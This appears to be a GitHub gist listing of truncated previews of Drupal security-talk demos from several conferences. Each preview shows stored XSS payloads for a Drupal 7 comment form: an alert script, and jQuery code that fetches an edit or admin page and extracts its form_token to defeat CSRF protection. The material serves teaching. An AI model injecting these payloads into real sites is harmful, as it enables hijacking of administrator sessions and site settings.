Balázs János Tatár tatarbj
tatarbj
/ DUG Belgium
Created
August 8, 2019 09:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form again | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ DrupalCamp Pannonia
Created
July 20, 2019 17:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form again | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ DrupalCamp Poland
Last active
June 1, 2019 12:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form again | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ Drupalcamp Kyiv
Created
May 24, 2019 23:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ DrupalCamp Belarus
Created
May 16, 2019 10:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalcampspain
Created
May 7, 2019 12:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalmountaincamp
Created
March 4, 2019 18:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalcamplondon
Created
February 28, 2019 15:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalcamposlo demo
Created
November 9, 2018 21:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ drupaleurope demo
Last active
September 17, 2018 12:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
NewerOlder